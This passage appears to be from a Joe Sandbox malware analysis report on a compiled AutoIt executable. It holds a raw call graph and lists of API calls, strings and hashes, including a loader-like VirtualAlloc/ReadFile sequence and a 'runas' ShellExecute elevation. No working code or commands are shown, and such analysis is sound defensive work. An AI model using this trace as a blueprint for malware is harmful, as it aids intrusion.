86117->86119 86123 41ee1c 86117->86123 86240 417f36 67 API calls __getptd_noexit 86119->86240 86121 41edb7 86239 417f23 67 API calls __getptd_noexit 86121->86239 86122 41ede0 86241 417f23 67 API calls __getptd_noexit 86122->86241 86126 41ee29 86123->86126 86127 41ee3d 86123->86127 86243 417f36 67 API calls __getptd_noexit 86126->86243 86130 41ba3b ___lock_fhandle 68 API calls 86127->86130 86128 41ede7 86242 417ebb 6 API calls 2 library calls 86128->86242 86131 41ee43 86130->86131 86133 41ee50 86131->86133 86134 41ee66 86131->86134 86132 41ee2e 86244 417f23 67 API calls __getptd_noexit 86132->86244 86169 41e7dc 86133->86169 86245 417f23 67 API calls __getptd_noexit 86134->86245 86137 41edbf __alloc_osfhnd 86137->86102 86140 41ee5e 86247 41ee91 LeaveCriticalSection __unlock_fhandle 86140->86247 86141 41ee6b 86246 417f36 67 API calls __getptd_noexit 86141->86246 86145 41e6c1 86144->86145 86149 41e6de 86144->86149 86251 417f23 67 API calls __getptd_noexit 86145->86251 86147 41e6c6 86252 417ebb 6 API calls 2 library calls 86147->86252 86150 41e713 86149->86150 86156 41e6d6 86149->86156 86248 423600 86149->86248 86152 41453a __fileno 67 API calls 86150->86152 86153 41e727 86152->86153 86154 41ed9e __read 79 API calls 86153->86154 86155 41e72e 86154->86155 86155->86156 86157 41453a __fileno 67 API calls 86155->86157 86156->86102 86158 41e751 86157->86158 86158->86156 86159 41453a __fileno 67 API calls 86158->86159 86160 41e75d 86159->86160 86160->86156 86161 41453a __fileno 67 API calls 86160->86161 86162 41e769 86161->86162 86163 41453a __fileno 67 API calls 86162->86163 86163->86156 86164->86110 86166->86102 86167->86110 86168->86110 86170 41e813 86169->86170 86171 41e7f8 86169->86171 86173 41e822 86170->86173 86174 41e849 86170->86174 86172 417f36 __close 67 API calls 86171->86172 86176 41e7fd 86172->86176 86175 417f36 __close 67 API calls 86173->86175 86178 41e868 86174->86178 86189 41e87c 86174->86189 86177 41e827 86175->86177 86179 417f23 _sprintf 67 API calls 86176->86179 86180 417f23 _sprintf 67 API calls 86177->86180 86181 417f36 __close 67 API calls 86178->86181 86190 41e805 86179->86190 86183 41e82e 86180->86183 86185 41e86d 86181->86185 86182 41e8d4 86184 417f36 __close 67 API calls 86182->86184 86186 417ebb _sprintf 6 API calls 86183->86186 86187 41e8d9 86184->86187 86188 417f23 _sprintf 67 API calls 86185->86188 86186->86190 86191 417f23 _sprintf 67 API calls 86187->86191 86192 41e874 86188->86192 86189->86182 86189->86190 86193 41e8b0 86189->86193 86194 41e8f5 86189->86194 86190->86140 86191->86192 86195 417ebb _sprintf 6 API calls 86192->86195 86193->86182 86201 41e8bb ReadFile 86193->86201 86196 416fb6 __malloc_crt 67 API calls 86194->86196 86195->86190 86198 41e90b 86196->86198 86204 41e931 86198->86204 86205 41e913 86198->86205 86199 41ed62 GetLastError 86202 41ebe8 86199->86202 86203 41ed6f 86199->86203 86200 41e9e7 86200->86199 86208 41e9fb 86200->86208 86201->86199 86201->86200 86212 417f49 __dosmaperr 67 API calls 86202->86212 86217 41eb6d 86202->86217 86206 417f23 _sprintf 67 API calls 86203->86206 86209 423462 __lseeki64_nolock 69 API calls 86204->86209 86207 417f23 _sprintf 67 API calls 86205->86207 86210 41ed74 86206->86210 86211 41e918 86207->86211 86208->86217 86218 41ea17 86208->86218 86221 41ec2d 86208->86221 86213 41e93d 86209->86213 86214 417f36 __close 67 API calls 86210->86214 86215 417f36 __close 67 API calls 86211->86215 86212->86217 86213->86201 86214->86217 86215->86190 86216 413a88 __mtterm 67 API calls 86216->86190 86217->86190 86217->86216 86219 41ea7d ReadFile 86218->86219 86226 41eafa 86218->86226 86222 41ea9b GetLastError 86219->86222 86229 41eaa5 86219->86229 86220 41eca5 ReadFile 86223 41ecc4 GetLastError 86220->86223 86230 41ecce 86220->86230 86221->86217 86221->86220 86222->86218 86222->86229 86223->86221 86223->86230 86224 41ebbe MultiByteToWideChar 86224->86217 86225 41ebe2 GetLastError 86224->86225 86225->86202 86226->86217 86227 41eb75 86226->86227 86228 41eb68 86226->86228 86234 41eb32 86226->86234 86227->86234 86235 41ebac 86227->86235 86231 417f23 _sprintf 67 API calls 86228->86231 86229->86218 86232 423462 __lseeki64_nolock 69 API calls 86229->86232 86230->86221 86233 423462 __lseeki64_nolock 69 API calls 86230->86233 86231->86217 86232->86229 86233->86230 86234->86224 86236 423462 __lseeki64_nolock 69 API calls 86235->86236 86237 41ebbb 86236->86237 86237->86224 86238->86121 86239->86137 86240->86122 86241->86128 86243->86132 86244->86128 86245->86141 86246->86140 86247->86137 86249 416fb6 __malloc_crt 67 API calls 86248->86249 86250 423615 86249->86250 86250->86150 86251->86147 86256 414cef GetSystemTimeAsFileTime __aulldiv 86253->86256 86255 4431ef 86255->85757 86256->86255 86257->85764 86259->85770 86264 4523e1 _wcscpy 86260->86264 86261 4151b0 81 API calls __fread_nolock 86261->86264 86262 44afdc GetSystemTimeAsFileTime 86262->86264 86263 452553 86263->85687 86263->85688 86264->86261 86264->86262 86264->86263 86265 41557c 105 API calls _fseek 86264->86265 86265->86264 86267 44b1b4 86266->86267 86268 44b1a6 86266->86268 86270 44b1c2 86267->86270 86271 44b1ca 86267->86271 86272 414e06 138 API calls 86267->86272 86269 414e06 138 API calls 86268->86269 86269->86267 86270->85715 86301 4352d1 81 API calls 2 library calls 86271->86301 86274 44b2c1 86272->86274 86274->86271 86276 44b2cf 86274->86276 86275 44b20d 86277 44b211 86275->86277 86278 44b23b 86275->86278 86279 44b2dc 86276->86279 86280 414e94 __fcloseall 106 API calls 86276->86280 86282 44b21e 86277->86282 86284 414e94 __fcloseall 106 API calls 86277->86284 86302 43526e 86278->86302 86279->85715 86280->86279 86285 44b22e 86282->86285 86288 414e94 __fcloseall 106 API calls 86282->86288 86283 44b242 86286 44b270 86283->86286 86287 44b248 86283->86287 86284->86282 86285->85715 86312 44b0af 111 API calls 86286->86312 86289 44b255 86287->86289 86291 414e94 __fcloseall 106 API calls 86287->86291 86288->86285 86292 44b265 86289->86292 86294 414e94 __fcloseall 106 API calls 86289->86294 86291->86289 86292->85715 86293 44b276 86313 43522c 67 API calls __mtterm 86293->86313 86294->86292 86296 44b27c 86297 44b289 86296->86297 86298 414e94 __fcloseall 106 API calls 86296->86298 86299 44b299 86297->86299 86300 414e94 __fcloseall 106 API calls 86297->86300 86298->86297 86299->85715 86300->86299 86301->86275 86303 4138ba _malloc 67 API calls 86302->86303 86304 43527d 86303->86304 86305 4138ba _malloc 67 API calls 86304->86305 86306 43528d 86305->86306 86307 4138ba _malloc 67 API calls 86306->86307 86308 43529d 86307->86308 86310 4352bc 86308->86310 86314 43522c 67 API calls __mtterm 86308->86314 86310->86283 86311 4352c8 86311->86283 86312->86293 86313->86296 86314->86311 86315->85604 86316->85606 86317->85624 86318->85624 86319->85624 86320->85618 86321->85624 86322->85624 86323->85628 86324->85637 86326->85638 86327->85528 86329 410148 SHGetDesktopFolder 86328->86329 86331 4101a3 _wcscpy 86328->86331 86330 41015a _wcscpy 86329->86330 86329->86331 86330->86331 86332 41018a SHGetPathFromIDListW 86330->86332 86331->85532 86332->86331 86333->85534 86335 40f5e0 152 API calls 86334->86335 86336 40f417 86335->86336 86337 42ca37 86336->86337 86338 40f42c 86336->86338 86339 42ca1f 86336->86339 86340 452574 140 API calls 86337->86340 86372 4037e0 139 API calls 7 library calls 86338->86372 86373 43717f 110 API calls _printf 86339->86373 86341 42ca50 86340->86341 86344 42ca76 86341->86344 86345 42ca54 86341->86345 86349 41171a 75 API calls 86344->86349 86348 434fe1 106 API calls 86345->86348 86346 40f446 86346->85531 86347 42ca2d 86347->86337 86350 42ca5e 86348->86350 86359 42cacc ctype 86349->86359 86374 43717f 110 API calls _printf 86350->86374 86352 42ca6c 86352->86344 86353 42ccc3 86354 413a88 __mtterm 67 API calls 86353->86354 86355 42cccd 86354->86355 86356 434fe1 106 API calls 86355->86356 86357 42ccda 86356->86357 86359->86353 86362 401b70 75 API calls 86359->86362 86365 402cc0 75 API calls 2 library calls 86359->86365 86366 4026a0 86359->86366 86375 445051 75 API calls _realloc 86359->86375 86376 44c80c 87 API calls 3 library calls 86359->86376 86377 44b408 75 API calls 86359->86377 86362->86359 86365->86359 86367 4026af 86366->86367 86370 40276b 86366->86370 86368 41171a 75 API calls 86367->86368 86369 4026ee ctype 86367->86369 86367->86370 86368->86369 86369->86370 86371 41171a 75 API calls 86369->86371 86370->86359 86371->86369 86372->86346 86373->86347 86374->86352 86375->86359 86376->86359 86377->86359 86378->85541 86379->85542 86381 401bfb 86380->86381 86401 401cde 86380->86401 86403 4013a0 86381->86403 86384 42a9a0 LoadStringW 86387 42a9bb 86384->86387 86385 401c18 86386 4021e0 75 API calls 86385->86386 86388 401c2d 86386->86388 86409 40df50 75 API calls 86387->86409 86390 401c3a 86388->86390 86391 42a9cd 86388->86391 86390->86387 86392 401c44 86390->86392 86410 40d3b0 75 API calls 2 library calls 86391->86410 86408 40d3b0 75 API calls 2 library calls 86392->86408 86394 401c53 _memset _wcscpy _wcsncpy 86400 401cc2 Shell_NotifyIconW 86394->86400 86396 42a9dc 86396->86394 86397 42a9f0 86396->86397 86411 40d3b0 75 API calls 2 library calls 86397->86411 86399 42a9fe 86400->86401 86401->85553 86402->85548 86404 41171a 75 API calls 86403->86404 86405 4013c4 86404->86405 86406 401380 75 API calls 86405->86406 86407 4013d3 86406->86407 86407->86384 86407->86385 86408->86394 86409->86394 86410->86396 86411->86399 86412 444343 86415 444326 86412->86415 86414 44434e WriteFile 86416 444340 86415->86416 86417 4442c7 86415->86417 86416->86414 86422 40e190 SetFilePointerEx 86417->86422 86419 4442e0 SetFilePointerEx 86423 40e190 SetFilePointerEx 86419->86423 86421 4442ff 86421->86414 86422->86419 86423->86421 86424 40023f8 86438 4000048 86424->86438 86426 4002481 86441 40022e8 86426->86441 86428 40024aa CreateFileW 86430 40024f9 86428->86430 86431 40024fe 86428->86431 86431->86430 86432 4002515 VirtualAlloc 86431->86432 86432->86430 86433 4002533 ReadFile 86432->86433 86433->86430 86434 400254e 86433->86434 86435 40012e8 13 API calls 86434->86435 86436 4002581 86435->86436 86437 40025a4 ExitProcess 86436->86437 86437->86430 86440 40006d3 86438->86440 86444 40034a8 GetPEB 86438->86444 86440->86426 86442 40022f1 Sleep 86441->86442 86443 40022ff 86442->86443 86444->86440 86445 46d22f 86448 46d098 86445->86448 86447 46d241 86449 46d0b5 86448->86449 86450 46d115 86449->86450 86451 46d0b9 86449->86451 86499 45c216 78 API calls 86450->86499 86452 41171a 75 API calls 86451->86452 86454 46d0c0 86452->86454 86456 46d0cc 86454->86456 86496 40d940 76 API calls 86454->86496 86455 46d126 86457 46d0f8 86455->86457 86463 46d142 86455->86463 86460 453063 111 API calls 86456->86460 86458 4092c0 VariantClear 86457->86458 86461 46d0fd 86458->86461 86462 46d0dd 86460->86462 86461->86447 86497 40dfa0 83 API calls 86462->86497 86464 46d1c8 86463->86464 86466 46d158 86463->86466 86504 4676a3 78 API calls 86464->86504 86469 453063 111 API calls 86466->86469 86467 46d0ea 86467->86463 86470 46d0ee 86467->86470 86479 46d15e 86469->86479 86470->86457 86498 44ade5 CloseHandle ctype 86470->86498 86471 46d1ce 86505 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 86471->86505 86472 46d18d 86500 467fce 82 API calls 86472->86500 86474 46d196 86477 4013a0 75 API calls 86474->86477 86480 46d1a2 86477->86480 86478 46d1e7 86482 4092c0 VariantClear 86478->86482 86490 46d194 86478->86490 86479->86472 86479->86474 86501 40df50 75 API calls 86480->86501 86482->86490 86483 46d1ac 86502 40d3b0 75 API calls 2 library calls 86483->86502 86485 46d224 86485->86447 86486 46d1b8 86503 467fce 82 API calls 86486->86503 86489 46d216 86506 44ade5 CloseHandle ctype 86489->86506 86490->86485 86492 40d900 86490->86492 86493 40d917 86492->86493 86494 40d909 86492->86494 86493->86494 86495 40d91c CloseHandle 86493->86495 86494->86489 86495->86489 86496->86456 86497->86467 86498->86457 86499->86455 86500->86490 86501->86483 86502->86486 86503->86490 86504->86471 86505->86478 86506->86485 86507 42919b 86512 40ef10 86507->86512 86510 411421 __cinit 74 API calls 86511 4291aa 86510->86511 86513 41171a 75 API calls 86512->86513 86514 40ef17 86513->86514 86515 42ad48 86514->86515 86520 40ef40 74 API calls __cinit 86514->86520 86517 40ef2a 86521 40e470 86517->86521 86520->86517 86522 40c060 75 API calls 86521->86522 86523 40e483 GetVersionExW 86522->86523 86524 4021e0 75 API calls 86523->86524 86525 40e4bb 86524->86525 86547 40e600 86525->86547 86530 42accc 86533 42ad28 GetSystemInfo 86530->86533 86536 42ad38 GetSystemInfo 86533->86536 86534 40e557 GetCurrentProcess 86567 40ee30 LoadLibraryA GetProcAddress 86534->86567 86535 40e56c 86535->86536 86560 40eee0 86535->86560 86540 40e5c9 86564 40eea0 86540->86564 86543 40e5e0 86545 40e5f1 FreeLibrary 86543->86545 86546 40e5f4 86543->86546 86544 40e5dd FreeLibrary 86544->86543 86545->86546 86546->86510 86548 40e60b 86547->86548 86549 40c740 75 API calls 86548->86549 86550 40e4c2 86549->86550 86551 40e620 86550->86551 86552 40e62a 86551->86552 86553 42ac93 86552->86553 86554 40c740 75 API calls 86552->86554 86555 40e4ce 86554->86555 86555->86530 86556 40ee70 86555->86556 86557 40e551 86556->86557 86558 40ee76 LoadLibraryA 86556->86558 86557->86534 86557->86535 86558->86557 86559 40ee87 GetProcAddress 86558->86559 86559->86557 86561 40e5bf 86560->86561 86562 40eee6 LoadLibraryA 86560->86562 86561->86533 86561->86540 86562->86561 86563 40eef7 GetProcAddress 86562->86563 86563->86561 86568 40eec0 LoadLibraryA GetProcAddress 86564->86568 86566 40e5d3 GetNativeSystemInfo 86566->86543 86566->86544 86567->86535 86568->86566 86569 40116e 86570 401119 DefWindowProcW 86569->86570

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                                                                              • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\LlbpXphTu9.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                                                                                                              • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                                                                                                              • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\LlbpXphTu9.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                                                                              • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\LlbpXphTu9.exe,00000004), ref: 0040D7D6
                                                                                                                                                                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\LlbpXphTu9.exe,00000004), ref: 00431B0E
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\LlbpXphTu9.exe,00000004), ref: 00431B3F
                                                                                                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                                                                            • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                                                                              • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                                                              • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                                                              • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                                                              • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                                                              • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                              • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                              • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                              • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                                                                                              • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                                                                            • String ID: @GH$@GH$C:\Users\user\Desktop\LlbpXphTu9.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                            • API String ID: 2493088469-4167698597
                                                                                                                                                                            • Opcode ID: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                                                                            • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                                                                            • Opcode Fuzzy Hash: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                                                                            • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 138 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 147 40e506-40e509 138->147 148 42accc-42acd1 138->148 151 40e540-40e555 call 40ee70 147->151 152 40e50b-40e51c 147->152 149 42acd3-42acdb 148->149 150 42acdd-42ace0 148->150 153 42ad12-42ad20 149->153 154 42ace2-42aceb 150->154 155 42aced-42acf0 150->155 169 40e557-40e573 GetCurrentProcess call 40ee30 151->169 170 40e579-40e5a8 151->170 156 40e522-40e525 152->156 157 42ac9b-42aca7 152->157 168 42ad28-42ad2d GetSystemInfo 153->168 154->153 155->153 159 42acf2-42ad06 155->159 156->151 160 40e527-40e537 156->160 162 42acb2-42acba 157->162 163 42aca9-42acad 157->163 164 42ad08-42ad0c 159->164 165 42ad0e 159->165 166 42acbf-42acc7 160->166 167 40e53d 160->167 162->151 163->151 164->153 165->153 166->151 167->151 171 42ad38-42ad3d GetSystemInfo 168->171 169->170 179 40e575 169->179 170->171 172 40e5ae-40e5c3 call 40eee0 170->172 172->168 178 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 172->178 182 40e5e0-40e5ef 178->182 183 40e5dd-40e5de FreeLibrary 178->183 179->170 184 40e5f1-40e5f2 FreeLibrary 182->184 185 40e5f4-40e5ff 182->185 183->182 184->185
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                                                                                                            • String ID: pMH
                                                                                                                                                                            • API String ID: 2923339712-2522892712
                                                                                                                                                                            • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                                                            • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                                                            • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                                                                                            • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                                                            • API String ID: 2574300362-3542929980
                                                                                                                                                                            • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                                                            • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                                                            • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                                                                            • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                                                                                              • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                            • _wcsncat.LIBCMT ref: 00410C78
                                                                                                                                                                            • __wmakepath.LIBCMT ref: 00410C94
                                                                                                                                                                              • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                              • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                              • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                                                                            • _wcscat.LIBCMT ref: 00429C43
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00429C55
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00429C66
                                                                                                                                                                            • _wcscat.LIBCMT ref: 00429C80
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                                                                            • API String ID: 1004883554-2276155026
                                                                                                                                                                            • Opcode ID: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                                                                            • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                                                                            • Opcode Fuzzy Hash: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                                                                            • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
